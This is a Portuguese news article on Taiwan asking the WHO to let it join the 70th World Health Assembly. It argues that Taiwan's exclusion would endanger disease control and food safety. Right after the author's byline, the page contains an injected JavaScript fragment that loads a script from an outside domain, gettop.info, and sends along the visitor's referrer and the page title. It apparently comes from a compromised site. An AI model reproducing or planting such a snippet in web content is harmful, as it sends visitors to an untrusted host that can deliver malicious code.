Taiwan pede à OMS para participar da Assembleia Mundial de Saúde

 

Ativa participação nas reuniões técnicas da OMS melhora controle de doenças no país

Foto: Divulgação

Taiwan solicita à Organização Mundial de Saúde (OMS) que permita sua participação na 70ª Assembleia Mundial da Saúde e que a comunidade internacional apoie sua participação nessa assembleia, que será realizada entre os próximos dias 22 e 31 de maio, em Genebra (Suíça), e  busca beneficiar toda a humanidade.

Há nove anos, tendo recebido um tremendo apoio internacional, Taiwan foi convidado pela OMS para participar da  62ª Assembleia Mundial de Saúde, como observador. Desde então, a ativa participação taiwanesa nas reuniões técnicas da OMS e da Assembleia Mundial de Saúde melhorou o controle de doenças em Taiwan e em todo o mundo, já que o governo taiwanês se comprometeu a ajudar outros países que enfrentam desafios de saúde para cumprir a missão da OMS.

Riscos

Este ano, Taiwan pretende manter sua participação profissional e pragmática na OMS, incluindo o Programa de Emergências em Saúde, de modo a contribuir para os esforços globais destinados a atingir o Objetivo de Desenvolvimento Sustentável 3 (SDG 3). Até 2030: para garantir uma vida saudável e promover o bem-estar para todos em todas as idades. A ausência de Taiwan na OMS abriria uma grave fissura no sistema de saúde global e criaria riscos significativos. Esses riscos incluem:

  • Propagação de epidemias:
  • Taiwan administra a Região de Informação de Voo de Taipei, que transporta mais de 60 milhões de passageiros de entrada e de saída por ano. Um surto de doença infecciosa como MERS (Coronavírus), Ebola ou Zika seria amplificado pela posição crítica de Taiwan na rede global de transporte.
  • Quase 1,25 milhão de pássaros voam sobre Taiwan a cada ano, à medida que migram da China Continental, Japão e Coreia do Sul para o Sudeste Asiático e nações insulares pacíficas. Como Taiwan é uma parada intermediária importante para aves migratórias, o risco de surtos de gripe aviária é considerável.
  • Segurança Alimentar:

Em um país, os produtos alimentícios fabricados usam ingredientes de todo o mundo. No entanto, como a OMS observou em 2015, mais de dois milhões de pessoas morrem anualmente por causa de  alimentos contaminados ou água potável. Considerando que Taiwan é o 17º maior exportador mundial e 18º maior importador de mercadorias em 2015, a segurança alimentar global seria difícil de gerenciar e controlar se Taiwan fosse excluída.

Experiências compartilhadas

A OMS precisa de Taiwan para construir um sistema de saúde global robusto, e Taiwan também precisa da OMS. A participação taiwanesa na OMS nos últimos oito anos permitiu o compartilhamento de experiências com outros países, para relatar e receber prontamente informações sobre prevenção de doenças e a fim de contribuir melhor para a saúde.

A continuação da participação de Taiwan na Assembleia Mundial de Saúde e em outros mecanismos, reuniões e atividades relacionados à OMS assegurará ainda mais a implementação do SDG 3 e atenderá o interesse de todas as partes envolvidas: Taiwan, a OMS e a Comunidade Internacional como um todo.

*Cláudio Caxito, especial para Brasília Capitals.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário